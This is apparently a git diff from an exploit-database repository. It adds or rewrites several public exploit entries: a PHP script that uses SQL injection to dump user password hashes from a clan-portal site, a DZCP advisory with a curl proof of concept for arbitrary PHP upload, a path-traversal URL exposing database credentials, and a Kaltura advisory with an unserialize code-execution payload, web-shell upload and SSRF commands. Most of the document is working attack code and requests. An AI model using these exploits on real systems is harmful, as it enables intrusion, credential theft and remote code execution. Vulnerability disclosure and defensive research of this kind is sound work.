+{
+    $connection = curl_init();
+
+    if ($_SERVER['argv'][5])
+    {
+        curl_setopt($connection, CURLOPT_TIMEOUT, 8);
+        curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]);
+    }
+    curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
+    curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt ($connection, CURLOPT_HEADER, 0);
+    curl_setopt ($connection, CURLOPT_POST, 1);
+    curl_setopt ($connection, CURLOPT_COOKIE, 1);
+    curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt');
+    curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt');
+    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=login&do=yes");
+    curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER['argv'][2] . "&pwd=" . $_SERVER['argv'][3] . "&permanent=1");
+
+    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
+
+    curl_setopt ($connection, CURLOPT_POST, 0);
+    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=x128");
+    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
+
+    preg_match("/FROM ([0-9a-zA-Z_]*)messages/", $source, $prefix);
+
+    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("-1 UNION SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4]));
+    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
+
+    preg_match("/>([0-9a-f]{32})</", $source, $password);
+    preg_match("/RE: (.*)\" class/", $source, $user);
+
+    if ($password[1])
+    {
+        echo "oo user           " . $user[1] . "\n";
+        echo "oo password       " . $password[1] . "\n\n";
+        echo "oo dafaced ...\n";
+    }
+
+    curl_close ($connection);
+}
+
+exploit_init();
+exploit_header();
+exploit_execute();
+exploit_bottom();
+?>
+
+# milw0rm.com [2006-07-01]
diff --git a/platforms/php/webapps/2876.txt b/platforms/php/webapps/2876.txt
index dce008cd4..563530301 100755
--- a/platforms/php/webapps/2876.txt
+++ b/platforms/php/webapps/2876.txt
@@ -1,50 +1,50 @@
-S Y N O P S I S  /
-================='
--(  access: remote   severity: high  )-
-deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on
-the server's filesystem, which enables anyone, even without a user account, to
-upload PHP code and execute it, leading to arbitrary code execution.
-
-
-B A C K G R O U N D  /
-====================='
-deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody
-to create a feature-rich website for her online gaming clan.
-
-
-A F F E C T E D   V E R S I O N S  /
-==================================='
-verified on:  1.3.6
-possibly vulnerable:  <= 1.3.6
-fixed in:  1.3.6.1
-
-
-I M P A C T  /
-============='
-The attacker can run own code on the web sever with the same privileges as DZCP
-itself, enabling her to do almost anything from getting the MySQL password to
-hosting own files and scripts or getting a shell on the server.
-
-
-P R E R E Q U I S I T I E S  /
-============================='
-the attacker needs a file that is both a valid JPEG or GIF file and valid
-PHP (or probably other) code
-
-A B O U T   T H E   A U T H O R  /
-================================='
-Tim Weber, computer science student at the University of Mannheim, Germany,
-currently looking for an internship at some IT security or pentesting company,
-can be reached via e-mail: scy-adv-061124b at the host scytale.de.
-
-P R O O F   O F   C O N C E P T  /
-================================='
-Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or
-in similar places.  Make sure PHP's getimagesize() does not return false and
-that the file does not throw parse errors or the like when fed to PHP.  Then:
-
-curl -F 'file=@img.php;type=image/jpeg' 'http://<dzcp>/upload/index.php?action=userpic&do=upload'
-
-Then check http://<dzcp>/inc/images/uploads/userpics/.php
-
-# milw0rm.com [2006-12-01]
+S Y N O P S I S  /
+================='
+-(  access: remote   severity: high  )-
+deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on
+the server's filesystem, which enables anyone, even without a user account, to
+upload PHP code and execute it, leading to arbitrary code execution.
+
+
+B A C K G R O U N D  /
+====================='
+deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody
+to create a feature-rich website for her online gaming clan.
+
+
+A F F E C T E D   V E R S I O N S  /
+==================================='
+verified on:  1.3.6
+possibly vulnerable:  <= 1.3.6
+fixed in:  1.3.6.1
+
+
+I M P A C T  /
+============='
+The attacker can run own code on the web sever with the same privileges as DZCP
+itself, enabling her to do almost anything from getting the MySQL password to
+hosting own files and scripts or getting a shell on the server.
+
+
+P R E R E Q U I S I T I E S  /
+============================='
+the attacker needs a file that is both a valid JPEG or GIF file and valid
+PHP (or probably other) code
+
+A B O U T   T H E   A U T H O R  /
+================================='
+Tim Weber, computer science student at the University of Mannheim, Germany,
+currently looking for an internship at some IT security or pentesting company,
+can be reached via e-mail: scy-adv-061124b at the host scytale.de.
+
+P R O O F   O F   C O N C E P T  /
+================================='
+Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or
+in similar places.  Make sure PHP's getimagesize() does not return false and
+that the file does not throw parse errors or the like when fed to PHP.  Then:
+
+curl -F 'file=@img.php;type=image/jpeg' 'http://<dzcp>/upload/index.php?action=userpic&do=upload'
+
+Then check http://<dzcp>/inc/images/uploads/userpics/.php
+
+# milw0rm.com [2006-12-01]
diff --git a/platforms/php/webapps/3357.txt b/platforms/php/webapps/3357.txt
index dc57b4932..bff6c2560 100755
--- a/platforms/php/webapps/3357.txt
+++ b/platforms/php/webapps/3357.txt
@@ -1,10 +1,10 @@
-# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
-# Found by: Kiba
-# Solution: Install security Fix!
-# Exploit:
-
-http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php
-
-Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php
-
-# milw0rm.com [2007-02-21]
+# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
+# Found by: Kiba
+# Solution: Install security Fix!
+# Exploit:
+
+http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php
+
+Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php
+
+# milw0rm.com [2007-02-21]
diff --git a/platforms/php/webapps/39563.txt b/platforms/php/webapps/39563.txt
new file mode 100755
index 000000000..b5ddd2e3e
--- /dev/null
+++ b/platforms/php/webapps/39563.txt
@@ -0,0 +1,108 @@
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+
+Kaltura Community Edition Multiple Vulnerabilities
+Affected versions: Kaltura Community Edition <=11.1.0-2
+
+PDF:
+http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
+
++-----------+
+|Description|
++-----------+
+The Kaltura platform contains a number of vulnerabilities, allowing
+unauthenticated users to execute code, read files, and access services
+listening on the localhost interface. Vulnerabilities present in the
+application also allow authenticated users to execute code by uploading
+a file, and perform stored cross site scripting attacks from the Kaltura
+Management Console into the admin console. Weak cryptographic secret
+generation allows unauthenticated users to bruteforce password reset
+tokens for accounts, and allows low level users to perform privilege
+escalation attacks.
+
++------------+
+|Exploitation|
++------------+
+==Unserialize Code Execution==
+The following PHP POC will generate an object that leads to code
+execution when posted to an endpoint present on the server.
+Authentication is not required.
+[POC]
+<?php
+$init = "system('id;uname -a')";
+$cmd = $init.".die()";
+$len = strlen($cmd);
+$obj="a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:$len:\"$cmd\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}";
+$sploit = base64_encode($obj);
+echo $sploit;
+?>
+------------
+
+The Base64 encoded object generated above should be included in the
+kdata section of the following curl request:
+
+$curl
+http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit]
+
+==Arbitrary File Upload==
+Users authenticated to the KMC with appropriate privileges can upload
+arbitrary files through the "Upload Content" functionality. This can be
+used to upload a PHP web shell as an image file and gain command
+execution. In order to excute the code, the on-disk path of the uploaded
+file must be obtained, and then browsed to directly. Obtaining the
+uploaded file's path can be achieved with the following command.
+[POC]
+$curl
+http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx
+-b "[Valid Cookie]"
+
+Directly accessing the path "url" returned by the above request will
+result in the exceution of the uploaded php script.
+
+$curl http://[HOST]/[URL PATH]
+
+==SSRF / File Read (Limited)==
+A limited number of files on the host can be read by passing a "file://"
+protocol handler to a CURL call.
+[POC]
+$curl
+http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini
+
+Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The
+following POC uses the SSRF issue to send a command and retrieve
+statistics from memcached listening on localhost, which is present in a
+default Kaltura install.
+[POC]
+$curl
+http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
+-m 2 --data $'b=set nl 0 60 4\n\n\n\n\n'
+$curl
+http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
+--data "c=get nl&d=stats&e=quit"
+
++----------+
+| Solution |
++----------+
+Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the
+majority of these issues. No fixes are available for some of the issues
+disclosed, so carefully firewalling off the Kaltura interface is
+recommended.
+
++------------+
+| Additional |
++------------+
+A disclosure timeline, further information and additional less critical
+vulnerabilities are available in the accompanying PDF.
+http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
\ No newline at end of file